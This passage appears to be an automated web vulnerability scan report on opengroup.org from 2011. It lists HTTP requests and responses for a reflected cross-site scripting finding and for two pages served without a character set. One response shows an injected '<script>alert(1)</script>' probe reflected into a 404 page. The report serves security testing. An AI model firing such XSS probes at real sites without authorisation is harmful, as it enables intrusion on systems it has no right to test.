User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:15 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5116

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/togaf9/certe1cf2<script>alert(1)</script>e0cfa26c479/<br>
...[SNIP]...

2. HTML does not specify charset
There are 2 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.



2.1. http://www.opengroup.org/architecture/togaf8-doc/arch/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Request

GET /architecture/togaf8-doc/arch/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:50:39 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 1042

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN">
<!--NewPage-->
<html>
<head>
<meta name="generator" content="HTML Tidy, see www.w3.org">
<title>
The Open Group Architecture Framework Versi
...[SNIP]...

2.2. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Request

GET /architecture/togaf8-doc/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:50:40 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4376

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="generator" content="HTML Tidy, see www.w3.org">
<link type="text/css" rel="stylesheet" href="style.css">
<titl
...[SNIP]...
